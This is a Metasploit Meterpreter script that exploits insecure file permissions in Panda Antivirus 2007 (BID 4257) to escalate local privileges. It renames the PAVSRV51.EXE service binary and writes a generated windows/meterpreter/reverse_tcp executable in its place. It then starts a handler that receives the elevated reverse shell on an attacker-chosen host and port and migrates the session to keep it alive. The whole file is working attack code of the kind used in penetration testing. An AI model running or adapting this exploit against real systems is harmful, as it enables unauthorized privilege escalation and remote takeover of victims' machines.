# $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## ## # Panda Antivirus 2007 Local Privilege Escalation # This module exploits a privilege escalation vulnerability in # Panda Antivirus 2007. Due to insecure permission issues, a # local attacker can gain elevated privileges. # # This script has only been tested against Panda Antivirus 2007. # # BID - 4257 # mc[@]metasploit.com ## # # Options # opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], "-p" => [ true, "The port on the remote host where Metasploit is listening"] ) # # Default parameters # rhost = Rex::Socket.source_address("1.2.3.4") rport = 4444 # # Option parsing # opts.parse(args) do |opt, idx, val| case opt when "-h" print_status("Panda Antivirus 2007 privilege escalation.") print_line(opts.usage) raise Rex::Script::Completed when "-r" rhost = val when "-p" rport = val.to_i end end client.sys.process.get_processes().each do |m| if ( m['name'] =~ /PAVSRV51\.EXE/ ) print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") # Build out the exe payload. pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") pay.datastore['LHOST'] = rhost pay.datastore['LPORT'] = rport raw = pay.generate exe = Msf::Util::EXE.to_win32pe(client.framework, raw) # Change to our working directory. workingdir = client.fs.file.expand_path("%ProgramFiles%") client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\") # Create a backup of the original exe. print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...") client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'}) # Place our newly created exe with the orginal binary name. tempdir = client.fs.file.expand_path("%ProgramFiles%") tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE" print_status("Sending EXE payload '#{tempexe}'.") fd = client.fs.file.new(tempexe, "wb") fd.write(exe) fd.close print_status("Done, now just wait for the callback...") # Our handler to recieve the callback. handler = client.framework.exploits.create("multi/handler") handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" handler.datastore['LHOST'] = rhost handler.datastore['LPORT'] = rport # Keep our shell stable. handler.datastore['InitialAutoRunScript'] = "migrate -f" handler.datastore['ExitOnSession'] = false handler.exploit_simple( 'Payload' => handler.datastore['PAYLOAD'], 'RunAsJob' => true ) end end